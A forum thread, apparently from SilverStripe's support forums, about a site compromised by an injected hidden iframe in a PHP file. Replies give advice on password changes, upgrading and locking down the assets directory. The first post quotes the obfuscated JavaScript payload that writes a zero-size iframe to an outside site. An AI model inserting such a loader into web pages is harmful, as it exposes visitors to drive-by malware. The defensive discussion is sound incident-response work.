Hi, one of our sites was down for a few hours and apparently it was due to an iframe injected in /hsphere/local
/home/mywebiste/mywebsite.com.au/sapphire/main.php on line 121.

Has anyone experienced any issue like this? Do i need to change permissions to prevent this from happening again?

thats what the iframe looked like.

Line 121 contains the following:

<script> var Z = '0 03c0 0690 0660 0720 0610 06d0 0650 0200 0730 0720 0630 03d0 0220 0680 0740 0740 0700 03a0 02f0 02f0 0720 0610 0690 06e0 0620 06f0 0780 02e0 0750 0730 02f0 0610 0640 06f0 0620 0650 02f0 0690 06e0 0640 0650 0780 02e0 0700 0680 0700 0220 0200 0770 0690 0640 0740 0680 03d0 0220 0300 0220 0200 0680 0650 0690 0670 0680 0740 03d0 0220 0300 0220 0200 0660 0720 0610 06d0 0650 0620 06f0 0720 0640 0650 0720 03d0 0220 0300 0220 03e0 03c0 02f0 0690 0660 0720 0610 06d0 0650 03e'; XX = Z.replace(/0 0/g,'%'); document.write(unescape(XX)); </script> fr"+"a"+"m"+"ebor"+"de"+"r="0"><"+"/ifra"+"m"+"e>"); </script>

Cheers

Fabs

I'm not sure about this, but it seems to me that security@silverstripe.org would like to know about it - especially if you can tell them how it happened.

http://silverstripe.org/general-questions/show/264494#post264494

Looks like a drive by injection attack on your host, generally targeted at php files. This doesn't look like a specific Silverstripe problem. These jerks will hammer on sites until they get in, then find the first index looking file and append crap like the above to it.

1. Change your ftp/ssh/etc passwords immediately!
2. Stop reading step 2, you're supposed to be changing your passwords
3. You might want to start checking other files or sites you host there for similar attacks

Thanks Dalesaurus and Yurigoul for responding.

As it happears to be a hosting issue I won't submit the silverstipe security reporting. I have changed the passwords as well.

Cheers

FAbie

Response from host is that it is a problem with code. We are using 2.3.1 on this site. Emailed security@silverstripe to inform. and waiting to hear back.

Hi Fabie,

I suggest that you upgrade to 2.3.3, and ensure that your assets/ directory has this .htaccess file in it:

http://open.silverstripe.org/browser/phpinstaller/tags/2.3.3/assets/.htaccess

Thanks Sam for the post and your email.

I have now added the .htaccess file under assets but test.php files is still visible.
Haven't upgraded yet to 2.3.3 that would most prob be why. Will get the upgrade happening and see how things work out.

Thanks for your time.

Fabie, it is a problem at your host in that someone that is not you has changed your site files, not a Silverstripe issue. Typically this means someone has stolen login credentials (FTP/ssh/etc) or someone has compromised the entire system at your hosting company (less likely).

Sam's suggestion would overwrite any compromised files, which is good. But you can bet whomever did it in the first place will be back.

If your clients have access to the site via FTP/ssh/etc you should change their passwords too, then upgrade. And don't let them store those passwords anywhere silly. Heck, one of their machines could have some malware that is passing credentials back to whomever did the injection in the first place.